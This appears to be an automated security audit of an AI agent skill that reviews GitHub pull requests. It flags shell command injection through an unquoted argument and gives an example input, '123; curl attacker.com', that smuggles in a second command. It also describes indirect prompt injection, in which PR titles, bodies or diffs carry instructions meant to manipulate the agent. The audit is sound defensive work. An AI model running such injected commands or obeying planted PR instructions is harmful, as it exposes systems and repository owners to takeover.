review-pr
Fail
Audited by Gen Agent Trust Hub on Jun 23, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill constructs shell commands by directly interpolating the user-supplied argument
$0into GitHub CLI commands (gh pr view $0,gh pr diff $0). This pattern allows a malicious user to execute arbitrary shell commands by providing inputs containing shell metacharacters (e.g.,123; curl attacker.com). While the instructions include a natural language validation step, it does not provide a technical safeguard against command injection. - [PROMPT_INJECTION]: The skill ingests untrusted data from pull request titles, bodies, and code diffs, which creates a surface for indirect prompt injection. An attacker could craft a PR with embedded instructions aimed at manipulating the agent's review logic or performing unauthorized actions.
- Ingestion points: PR metadata and diff content fetched via
ghcommands. - Boundary markers: Absent; the skill lacks delimiters or explicit instructions to treat PR content as untrusted data.
- Capability inventory: The skill utilizes shell commands (
gh) which could be abused if the agent is manipulated. - Sanitization: Absent; the external PR content is passed directly into the agent's context for analysis.
Recommendations
- AI detected serious security threats
Audit Metadata